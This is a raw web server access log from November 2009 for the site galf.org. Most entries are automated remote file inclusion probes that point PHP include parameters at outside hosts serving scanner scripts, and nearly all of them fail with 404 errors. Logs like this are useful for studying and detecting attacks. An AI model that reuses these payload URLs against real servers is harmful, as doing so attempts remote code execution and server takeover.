70.86.9.234 - - [22/Nov/2009:22:31:36 -0800] "GET /logs/access_090914.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stmik90.fileave.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.219.58.34 - - [22/Nov/2009:22:33:42 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "MLBot (www.metadatalabs.com/mlbot)" "www.galf.org"
66.219.58.34 - - [22/Nov/2009:22:33:42 -0800] "GET / HTTP/1.1" 200 1048 "-" "MLBot (www.metadatalabs.com/mlbot)" "www.galf.org"
66.219.58.34 - - [22/Nov/2009:22:34:41 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "-" "MLBot (www.metadatalabs.com/mlbot)" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:22:35:28 -0800] "GET /logs/_blank/include/print_category.php?setup[use_category]=1&dir=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:22:35:28 -0800] "GET /_blank/include/print_category.php?setup[use_category]=1&dir=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:22:35:28 -0800] "GET /logs/access_091019.log%20%20/_blank/include/print_category.php?setup[use_category]=1&dir=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:22:35:30 -0800] "GET /logs/_blank/include/print_category.php?setup[use_category]=1&dir=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:22:35:30 -0800] "GET /logs/access_091019.log%20%20/_blank/include/print_category.php?setup[use_category]=1&dir=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:22:35:30 -0800] "GET /_blank/include/print_category.php?setup[use_category]=1&dir=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.219.58.34 - - [22/Nov/2009:22:35:32 -0800] "GET /labia/ HTTP/1.1" 200 524 "-" "MLBot (www.metadatalabs.com/mlbot)" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:22:35:37 -0800] "GET /logs/access_090928.log%20%20/_blank/include/print_category.php?setup[use_category]=1&dir=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:22:35:38 -0800] "GET /logs/access_090928.log%20%20/_blank/include/print_category.php?setup[use_category]=1&dir=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.219.58.34 - - [22/Nov/2009:22:36:23 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "MLBot (www.metadatalabs.com/mlbot)" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:22:39:30 -0800] "GET /logs/access_090921.log//bbs//skin/zero_vote/ask_password.php?dir=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:22:39:30 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.95.231.98 - - [22/Nov/2009:22:39:30 -0800] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.shilee.com//bbs/icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [22/Nov/2009:22:40:30 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://www.aerokazachok.ru/css/index.html?? HTTP/1.1" 404 - "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:22:40:53 -0800] "GET /logs/access_091026.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stmik90.fileave.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:22:41:10 -0800] "GET /logs/access_090914.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stmik90.fileave.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.22.119.110 - - [22/Nov/2009:22:42:14 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.aerokazachok.ru/css/index.html?? HTTP/1.1" 404 - "-" "Avant Browser (http://www.avantbrowser.com)" "galf.org"
64.22.119.110 - - [22/Nov/2009:22:42:14 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://www.aerokazachok.ru/css/index.html?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "galf.org"
114.108.177.238 - - [22/Nov/2009:22:45:37 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [22/Nov/2009:22:45:37 -0800] "GET /logs/access.log%20%20/e404.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [22/Nov/2009:22:45:37 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [22/Nov/2009:22:45:37 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [22/Nov/2009:22:45:37 -0800] "GET /logs/access.log%20%20/e404.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [22/Nov/2009:22:45:37 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [22/Nov/2009:22:45:39 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [22/Nov/2009:22:45:39 -0800] "GET /logs/access.log%20%20/e404.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [22/Nov/2009:22:45:39 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [22/Nov/2009:22:45:43 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:22:45:43 -0800] "GET /logs/access_090914.log%20%20/e404.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:22:45:43 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:22:45:44 -0800] "GET /logs/access_090914.log%20%20/e404.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:22:45:44 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:22:45:44 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:22:45:45 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:22:45:46 -0800] "GET /logs/access_090914.log%20%20/e404.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:22:45:46 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:22:46:15 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stmik90.fileave.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:22:46:17 -0800] "GET /logs/access_090622.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stmik90.fileave.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.152.181.222 - - [22/Nov/2009:22:48:05 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.152.181.222 - - [22/Nov/2009:22:48:05 -0800] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.152.181.222 - - [22/Nov/2009:22:48:06 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [22/Nov/2009:22:48:28 -0800] "GET /phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [22/Nov/2009:22:48:28 -0800] "GET /logs/access_090525.log//phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [22/Nov/2009:22:48:28 -0800] "GET /logs//phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [22/Nov/2009:22:48:33 -0800] "GET /logs//phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [22/Nov/2009:22:48:33 -0800] "GET /phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [22/Nov/2009:22:48:33 -0800] "GET /logs/access_090525.log//phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [22/Nov/2009:22:48:43 -0800] "GET /phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [22/Nov/2009:22:48:43 -0800] "GET /logs/access_090525.log//phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [22/Nov/2009:22:48:43 -0800] "GET /logs//phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://qqe.ru/forum/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.152.181.222 - - [22/Nov/2009:22:48:55 -0800] "GET /logs/access_091102.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [22/Nov/2009:22:49:03 -0800] "GET /phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [22/Nov/2009:22:49:03 -0800] "GET /logs/access_090525.log//phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [22/Nov/2009:22:49:03 -0800] "GET /logs//phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:22:49:23 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:22:49:24 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:22:49:24 -0800] "GET /logs/access_090525.log/?_SERVER[DOCUMENT_ROOT]=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:22:49:28 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:22:49:28 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:22:49:29 -0800] "GET /logs/access_090525.log/?_SERVER[DOCUMENT_ROOT]=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:22:50:04 -0800] "GET /logs/access_091102.log///modules/xfsection/modify.php?dir_module=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:22:50:04 -0800] "GET /logs/access_090504.log///modules/xfsection/modify.php?dir_module=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:22:50:04 -0800] "GET //modules/xfsection/modify.php?dir_module=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:22:50:04 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [22/Nov/2009:22:50:48 -0800] "GET /phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [22/Nov/2009:22:50:48 -0800] "GET /logs//phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [22/Nov/2009:22:50:49 -0800] "GET /logs//phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [22/Nov/2009:22:50:49 -0800] "GET /logs/access.log%20%20//phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [22/Nov/2009:22:50:51 -0800] "GET /logs/access.log%20%20//phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.101.214.54 - - [22/Nov/2009:22:50:54 -0800] "GET /phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.152.181.222 - - [22/Nov/2009:22:50:54 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.152.181.222 - - [22/Nov/2009:22:50:54 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.152.181.222 - - [22/Nov/2009:22:50:54 -0800] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [22/Nov/2009:22:51:03 -0800] "GET /logs//phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [22/Nov/2009:22:51:03 -0800] "GET /logs/access_090525.log//phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [22/Nov/2009:22:51:03 -0800] "GET /phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:22:51:03 -0800] "GET /logs/access_090608.log/?_SERVER[DOCUMENT_ROOT]=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:22:51:39 -0800] "GET /logs/access_090629.log/?_SERVER[DOCUMENT_ROOT]=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.152.181.222 - - [22/Nov/2009:22:51:48 -0800] "GET /logs/access_091102.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.162.36 - - [22/Nov/2009:22:51:50 -0800] "GET /logs/access_090629.log/?_SERVER[DOCUMENT_ROOT]=http://www.cbnumed.or.kr/bbs//zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [22/Nov/2009:22:52:23 -0800] "GET /phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [22/Nov/2009:22:52:23 -0800] "GET /logs//phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.101.214.54 - - [22/Nov/2009:22:52:23 -0800] "GET /logs/access_090525.log//phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.diskplus.kr/shop///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:22:53:05 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:22:53:05 -0800] "GET /logs/access_090504.log///modules/xfsection/modify.php?dir_module=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:22:53:05 -0800] "GET /logs/access_091102.log///modules/xfsection/modify.php?dir_module=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:22:53:05 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.30 - - [22/Nov/2009:22:53:33 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:22:56:01 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:22:56:01 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:22:56:06 -0800] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:22:56:51 -0800] "GET /logs/access_090921.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:22:56:56 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:22:56:56 -0800] "GET /logs/access.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:22:56:56 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.216.213.119 - - [22/Nov/2009:22:57:48 -0800] "GET /logs/access_090921.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.abruzzobooking.it/mambots/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:22:58:46 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/CaUghaNT/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:22:58:46 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/CaUghaNT/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:22:58:46 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/CaUghaNT/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:22:59:02 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/CaUghaNT/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:22:59:03 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/CaUghaNT/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
70.86.9.234 - - [22/Nov/2009:22:59:03 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://h1.ripway.com/CaUghaNT/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:23:04:33 -0800] "GET /logs/access_090504.log%20%20///modules/xfsection/modify.php?dir_module=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [22/Nov/2009:23:04:44 -0800] "GET /logs/access_091102.log%20%20///modules/xfsection/modify.php?dir_module=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:23:05:04 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:23:05:04 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:23:05:05 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:23:05:06 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [22/Nov/2009:23:05:06 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
